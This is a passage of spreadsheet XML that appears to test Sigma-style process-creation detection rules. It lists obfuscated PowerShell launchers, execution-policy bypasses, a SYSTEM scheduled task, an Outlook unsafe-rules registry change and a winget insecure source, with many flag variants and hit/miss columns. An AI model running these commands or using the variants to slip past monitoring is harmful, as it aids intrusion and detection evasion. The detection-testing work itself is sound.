          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4208" s="43" t="n"/>
      <c r="K4208" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4209" ht="15.75" customHeight="1" s="42">
      <c r="A4209" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4209" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_terminate_application</t>
        </is>
      </c>
      <c r="C4209" s="43" t="inlineStr">
        <is>
          <t>Application Terminated Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4209" s="43" t="inlineStr">
        <is>
          <t>49d9671b-0a0a-4c09-8280-d215bfd30662</t>
        </is>
      </c>
      <c r="E4209" s="43" t="inlineStr">
        <is>
          <t>wmic process where name="notepad.exe" delete</t>
        </is>
      </c>
      <c r="F4209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4209" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4209" s="43" t="n"/>
      <c r="K4209" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4210" ht="15.75" customHeight="1" s="42">
      <c r="A4210" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C4210" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D4210" s="43" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E4210" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F4210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4210" s="43" t="n"/>
      <c r="J4210" s="43" t="n"/>
      <c r="K4210" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4211" ht="15.75" customHeight="1" s="42">
      <c r="A4211" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4211" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C4211" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D4211" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E4211" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F4211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4211" s="43" t="n"/>
      <c r="J4211" s="43" t="n"/>
      <c r="K4211" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4212" ht="15.75" customHeight="1" s="42">
      <c r="A4212" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4212" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C4212" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D4212" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E4212" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-N' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F4212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4212" s="43" t="n"/>
      <c r="J4212" s="43" t="n"/>
      <c r="K4212" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4213" ht="15.75" customHeight="1" s="42">
      <c r="A4213" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C4213" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D4213" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E4213" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F4213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4213" s="43" t="n"/>
      <c r="J4213" s="43" t="n"/>
      <c r="K4213" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4214" ht="15.75" customHeight="1" s="42">
      <c r="A4214" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4214" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C4214" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D4214" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E4214" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F4214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4214" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4214" s="43" t="n"/>
      <c r="J4214" s="43" t="n"/>
      <c r="K4214" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4215" ht="15.75" customHeight="1" s="42">
      <c r="A4215" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_insecure_custom_source</t>
        </is>
      </c>
      <c r="C4215" s="43" t="inlineStr">
        <is>
          <t>Add Insecure Download Source To Winget</t>
        </is>
      </c>
      <c r="D4215" s="43" t="inlineStr">
        <is>
          <t>81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2</t>
        </is>
      </c>
      <c r="E4215" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd='winget.exe'; $args=@('" source"', '"add"' , '-n' , 'test' , '"http://10.10.10.10"' ); &amp; $cmd $args"</t>
        </is>
      </c>
      <c r="F4215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4215" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4215" s="43" t="n"/>
      <c r="J4215" s="43" t="n"/>
      <c r="K4215" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4216" ht="15.75" customHeight="1" s="42">
      <c r="A4216" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4216" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C4216" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D4216" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E4216" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F4216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4216" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4216" s="43" t="n"/>
      <c r="J4216" s="43" t="n"/>
      <c r="K4216" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4217" ht="15.75" customHeight="1" s="42">
      <c r="A4217" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4217" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4217" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4217" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4217" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F4217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4217" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4217" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4217" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J4217" s="43" t="n"/>
      <c r="K4217" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4218" ht="15.75" customHeight="1" s="42">
      <c r="A4218" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4218" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4218" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4218" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4218" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -c "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F4218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4218" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4218" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4218" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J4218" s="43" t="n"/>
      <c r="K4218" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4219" ht="15.75" customHeight="1" s="42">
      <c r="A4219" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4219" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C4219" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D4219" s="43" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4219" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F4219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4219" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4219" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J4219" s="43" t="n"/>
      <c r="K4219" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4220" ht="15.75" customHeight="1" s="42">
      <c r="A4220" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4220" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C4220" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D4220" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E4220" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F4220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4220" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4220" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J4220" s="43" t="n"/>
      <c r="K4220" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4221" ht="15.75" customHeight="1" s="42">
      <c r="A4221" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4221" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C4221" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D4221" s="43" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E4221" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F4221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4221" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4221" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J4221" s="43" t="n"/>
      <c r="K4221" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4222" ht="15.75" customHeight="1" s="42">
      <c r="A4222" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4222" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C4222" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D4222" s="43" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E4222" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F4222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4222" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4222" s="43" t="n"/>
      <c r="J4222" s="43" t="n"/>
      <c r="K4222" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4223" ht="15.75" customHeight="1" s="42">
      <c r="A4223" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4223" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C4223" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D4223" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E4223" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F4223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4223" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4223" s="43" t="n"/>
      <c r="J4223" s="43" t="n"/>
      <c r="K4223" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4224" ht="15.75" customHeight="1" s="42">
      <c r="A4224" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4224" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C4224" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D4224" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E4224" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F4224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4224" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4224" s="43" t="n"/>
      <c r="J4224" s="43" t="n"/>
      <c r="K4224" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4225" ht="15.75" customHeight="1" s="42">
      <c r="A4225" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4225" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C4225" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D4225" s="43" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E4225" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F4225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4225" s="43" t="n"/>
      <c r="J4225" s="43" t="n"/>
      <c r="K4225" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4226" ht="15.75" customHeight="1" s="42">
      <c r="A4226" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4226" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4226" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4226" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4226" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F4226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4226" s="43" t="n"/>
      <c r="J4226" s="43" t="n"/>
      <c r="K4226" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4227" ht="15.75" customHeight="1" s="42">
      <c r="A4227" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4227" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4227" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4227" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4227" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F4227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4227" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4227" s="43" t="n"/>
      <c r="K4227" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4228" ht="15.75" customHeight="1" s="42">
      <c r="A4228" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4228" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4228" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4228" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4228" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F4228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4228" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4228" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4228" s="43" t="n"/>
      <c r="K4228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4229" ht="15.75" customHeight="1" s="42">
      <c r="A4229" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4229" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C4229" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D4229" s="43" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E4229" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F4229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4229" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4229" s="43" t="n"/>
      <c r="J4229" s="43" t="n"/>
      <c r="K4229" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4230" ht="15.75" customHeight="1" s="42">
      <c r="A4230" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4230" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C4230" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D4230" s="43" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E4230" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F4230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4230" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J4230" s="43" t="n"/>
      <c r="K4230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4231" ht="15.75" customHeight="1" s="42">
      <c r="A4231" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4231" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C4231" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D4231" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E4231" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F4231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4231" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J4231" s="43" t="n"/>
      <c r="K4231" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4232" ht="15.75" customHeight="1" s="42">
      <c r="A4232" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4232" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C4232" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D4232" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E4232" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F4232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4232" s="43" t="n"/>
      <c r="J4232" s="43" t="n"/>
      <c r="K4232" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4233" ht="15.75" customHeight="1" s="42">
      <c r="A4233" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4233" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C4233" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D4233" s="43" t="inlineStr">
        <is>
